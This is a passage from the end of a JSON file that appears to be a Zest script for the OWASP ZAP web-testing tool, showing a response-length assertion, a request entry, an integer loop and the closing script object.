              "rootExpression": {
                "length": 0,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934519976,
          "cookies": [],
          "index": 17,
          "enabled": true,
          "elementType": "ZestRequest"
        }
      ],
      "variableName": "loop",
      "index": 1,
      "enabled": true,
      "elementType": "ZestLoopInteger"
    }
  ],
  "authentication": [],
  "index": 0,
  "enabled": true,
  "elementType": "ZestScript"
}
